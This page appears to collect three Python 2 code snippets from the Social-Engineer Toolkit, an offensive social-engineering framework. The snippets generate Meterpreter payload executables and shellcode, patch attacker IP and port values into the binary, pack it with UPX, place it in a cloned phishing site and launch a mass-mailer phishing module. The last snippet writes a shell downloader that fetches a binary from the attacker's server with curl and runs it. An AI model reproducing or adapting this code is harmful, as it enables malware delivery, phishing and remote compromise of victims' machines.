Exemple #1
0
     if main_menu_choice == '4':
        filewrite = file("src/program_junk/payloadgen", "w")
        filewrite.write("payloadgen=solo")
        filewrite.close()
        sys.path.append("src/core/payloadgen/")
        try: reload(create_payloads)
        except: import create_payloads
        setcore.PrintStatus("Your payload is now in the root directory of SET as msf.exe")
        if os.path.isfile("src/program_junk/meterpreter.alpha"):
                print "[*] Saving alphanumeric shellcode in root directory of SET as meterpreter.alpha"
                subprocess.Popen("cp src/program_junk/meterpreter.alpha ./", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
        subprocess.Popen("cp src/html/msf.exe ./msf.exe 1> /dev/null 2> /dev/null", shell = True).wait()
        
        # if we didn't select the SET interactive shell or RATTE
        if not os.path.isfile("src/program_junk/set.payload"):
                setcore.upx("msf.exe")

        # if the set payload is there
        if os.path.isfile("src/program_junk/set.payload"):
                subprocess.Popen("cp src/program_junk/msf.exe ./msf.exe 1> /dev/null 2> /dev/null", shell = True).wait()

        try: reload(solo)
        except: import solo
        raw_input("\nPress " + setcore.bcolors.RED + "{return}" + setcore.bcolors.ENDC + " to head back to the menu.")

     # Main Menu choice 5: Mass Mailer Attack
     if main_menu_choice == '5':
        sys.path.append("src/phishing/smtp/client")
        try: reload(smtp_web)
        except: import smtp_web
Exemple #2
0
    filewrite = open("src/program_junk/msf.exe", "wb")
    host = int(len(ipaddr) + 1) * "X"
    rPort = int(len(str(port)) + 1) * "Y"
    filewrite.write(data.replace(str(host), ipaddr + "\x00", 1))
    filewrite.close()
    fileopen = open("src/program_junk/msf.exe", "rb")
    data = fileopen.read()
    filewrite = open("src/program_junk/msf.exe", "wb")
    filewrite.write(data.replace(str(rPort), str(port) + "\x00", 1))
    filewrite.close()

setcore.PrintStatus("Done, moving the payload into the action.")

if upx_encode == "ON" or upx_encode == "on":
    # core upx
    setcore.upx("src/program_junk/msf.exe")

subprocess.Popen(
    "cp src/program_junk/msf.exe src/program_junk/web_clone/msf.exe",
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE,
    shell=True)
if payload_selection == "SETSHELL":
    subprocess.Popen(
        "cp src/payloads/set_payloads/shell.windows src/program_junk/web_clone/x",
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        shell=True)

# if we are targetting nix
if posix == True:
Exemple #3
0
        filewrite = open("src/program_junk/msf.exe", "wb")
        host = int(len(ipaddr)+1) * "X"
        rPort = int(len(str(port))+1) * "Y"
        filewrite.write(data.replace(str(host), ipaddr+"\x00", 1))
        filewrite.close()
        fileopen = open("src/program_junk/msf.exe", "rb")
        data = fileopen.read()
        filewrite = open("src/program_junk/msf.exe", "wb")
        filewrite.write(data.replace(str(rPort), str(port)+"\x00", 1))
        filewrite.close()

setcore.PrintStatus("Done, moving the payload into the action.")

if upx_encode == "ON" or upx_encode == "on":
                # core upx
                setcore.upx("src/program_junk/msf.exe")

subprocess.Popen("cp src/program_junk/msf.exe src/program_junk/web_clone/msf.exe", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
if payload_selection == "SETSHELL":
        subprocess.Popen("cp src/payloads/set_payloads/shell.windows src/program_junk/web_clone/x", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)

# if we are targetting nix
if posix == True:
        setcore.PrintInfo("Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...")
        filewrite = file("%s/src/program_junk/web_clone/mac.bin" % (definepath), "w")
        payload_flags = webserver.split(" ")
        # grab osx binary name
        osx_name = setcore.generate_random_string(10,10)
        downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],osx_name,osx_name,osx_name,payload_flags[1],payload_flags[2])
        filewrite.write(downloader)
        filewrite.close()